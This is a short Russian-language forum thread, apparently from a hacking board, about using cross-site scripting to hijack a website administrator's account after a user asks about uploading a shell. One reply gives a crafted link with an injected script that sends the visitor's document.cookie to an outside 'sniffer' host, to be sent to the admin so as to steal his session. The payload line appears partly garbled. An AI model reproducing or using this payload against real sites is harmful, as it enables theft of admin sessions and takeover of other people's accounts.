ХSS подразумевает немного иное, используется для разнообразных атак на компьютеры пользователей с целью их захвата, кражи куки (например админа данного ресурса)

Можно использовать что-то из этих уязвимостей для загрузки shell?

На мой взгляд - нет. Только попробовать провести xss на учетную запись админа

ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима.

А можно поподробнее о xss на админа? Или ссылку на тему )

Это значит, что будет сформированна специальная ссылка, которую надо будет дать админую.
Можно подлкючить сниффер куки ---> site.com/post.php?p='>img=new Image();img.src="http://xsssniffer.com/sniff.gif?"+document.cookie;"+document.cookie;

Почитать - тема очень обширная. Первым делом, следует проверить, а есть ли на ренсурсе та самая XSS (на себе в браузере). В вики есть статья

После прочтения уже будет более ясно, каким образом это использовать.